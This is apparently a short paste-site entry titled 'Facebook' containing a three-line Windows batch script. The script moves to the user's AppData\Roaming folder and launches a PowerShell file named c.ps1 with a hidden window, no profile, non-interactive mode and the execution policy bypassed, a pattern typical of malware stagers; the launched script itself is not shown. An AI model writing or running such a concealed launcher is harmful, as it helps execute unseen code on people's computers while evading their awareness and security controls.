Facebook
From Cobalt Bat, 1 Year ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 108
  1. @echo off
  2. powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
  3. pause